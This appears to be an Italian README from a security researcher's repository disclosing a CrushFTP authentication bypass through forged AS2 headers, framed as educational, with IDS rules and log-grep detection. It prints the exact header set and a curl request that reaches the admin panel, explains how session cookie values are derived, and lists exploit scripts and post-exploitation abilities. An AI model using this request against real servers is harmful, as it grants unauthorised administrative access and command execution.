
Scoperte e corsa di luglio con 0day in the wild
⚠️ IMPORTANTE: Questa vulnerabilità è stata corretta da CrushFTP a partire da novembre 2025. Questa ricerca è pubblicata esclusivamente a scopo educativo e difensivo.
📝 NOTA: Questa ricerca si basa su pattern di vulnerabilità simili a CVE-2025-54309. Il numero CVE esatto potrebbe differire. Si tratta di una ricerca di sicurezza indipendente condotta in un ambiente di laboratorio domestico controllato.
Questo repository documenta una vulnerabilità critica di bypass dell'autenticazione nei server CrushFTP che consente l'accesso amministrativo completo tramite manipolazione delle intestazioni AS2 (Applicability Statement 2). La vulnerabilità non richiede autenticazione e può essere sfruttata con una singola richiesta HTTP.
Punti chiave:
Ricercatore: SmileyFace101 (@SmileyFace101)
L'interfaccia web di CrushFTP si fida erroneamente delle intestazioni del protocollo AS2 senza una corretta validazione. Il server presume che le richieste AS2 siano pre-autenticate e bypassa le normali procedure di autenticazione.
Versioni Vulnerabili di CrushFTP (Confermate in Laboratorio):
Versioni Corrette:
Ambiente di Laboratorio:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
Esempio (Ambiente di Laboratorio):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
Nota: Utilizzare esclusivamente su sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione al test.
Durante lo sfruttamento, abbiamo scoperto una relazione matematica nella generazione dei cookie di sessione che rende lo sfruttamento affidabile al 100%:
Struttura CrushAuth: [TIMESTAMP]_[SESSION_ID]
currentAuth = Ultimi 4 caratteri di SESSION_ID
parametro c2f = Stesso valore di currentAuth
✅ Enumerazione completa del server e degli utenti
✅ Creazione e modifica di account utente
✅ Accesso e navigazione del filesystem
✅ Esecuzione comandi tramite interfaccia telnet
✅ Pianificazione job con privilegi di sistema
✅ Accesso a chiavi PGP e certificati
✅ Modifica della configurazione amministrativa
Vedere la directory detection/ per:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/ con intestazioni AS2# Log del server web
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# Log applicativi CrushFTP
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # Questo file – panoramica e utilizzo
├── docs/
│ └── TECHNICAL_ANALYSIS.md # Approfondimento tecnico completo
├── exploits/
│ ├── enhanced_session_exploit.sh # Sfruttamento completo con gestione sessione
│ ├── targeted_exploitation.sh # Test su endpoint di alto valore
│ └── adaptive_exploitation.sh # Approccio multi-strategia
└── detection/
├── snort_rules.txt # Firme IDS/IPS (Snort)
├── suricata_rules.txt # Firme IDS/IPS (Suricata)
└── log_analysis.sh # Analisi log e rilevamento IOC
Leggere la documentazione:
Testare nel proprio laboratorio:
# Assicurarsi di possedere il sistema di destinazione!
./exploits/enhanced_session_exploit.sh 10.0.100.50
Distribuire il rilevamento:
✅ Scoperto e documentato il bypass completo dell'autenticazione AS2
✅ Identificato e risolto il requisito critico di generazione del cookie di sessione
✅ Reverse engineering della relazione matematica nella gestione della sessione
✅ Sviluppata una metodologia di sfruttamento in due fasi
✅ Stabilito pattern di sfruttamento affidabile al 100%
✅ Identificati e analizzati molteplici vettori RCE
✅ Analisi completa del codice sorgente JavaScript
/WebInterface/admin/index.html – Pannello amministrativo principale/WebInterface/admin/telnet.html – Interfaccia Telnet/WebInterface/Jobs/index.html – Gestione job/WebInterface/UserManager/index.html – Gestione utenti/WebInterface/PGP/index.html – Gestione chiavi PGP/WebInterface/function/ – Processore di funzioni amministrativeAutore: SmileyFace101
GitHub: @SmileyFace101
Periodo di Ricerca: Marzo – Luglio 2025 (Laboratorio Domestico)
Divulgazione Pubblica: 6 Dicembre 2025
Questa ricerca è esclusivamente a scopo EDUCATIVO e DIFENSIVO.
✅ Uso Autorizzato:
❌ Vietato:
Utilizzando questa ricerca, accetti di:
Disclaimer: L'autore non è responsabile per un uso improprio. L'accesso non autorizzato a computer è illegale.
Licenza MIT – Vedere il file LICENSE per i dettagli.
Ultimo Aggiornamento: 6 Dicembre 2025
Valutazione del Rischio: CRITICO – Aggiornamento e mitigazione immediati richiesti
Ultimo Aggiornamento: 6 Dicembre 2025
Autore: SmileyFace101
Ricerca Condotta: Marzo – Luglio 2025 in ambiente di laboratorio autorizzato
| Aspetto di Sicurezza | Livello di Impatto | Descrizione |
|---|
| Riservatezza | 🔴 CRITICO | Accesso completo a credenziali, configurazioni, chiavi PGP, log |
| Integrità | 🔴 CRITICO | Creazione account utente, modifiche configurazione, modifiche file |
| Disponibilità | 🟡 ALTO | Esecuzione comandi di sistema, capacità di interruzione servizio |
| Escalation Privilegi | 🔴 CRITICO | Accesso amministrativo diretto, creazione account persistente |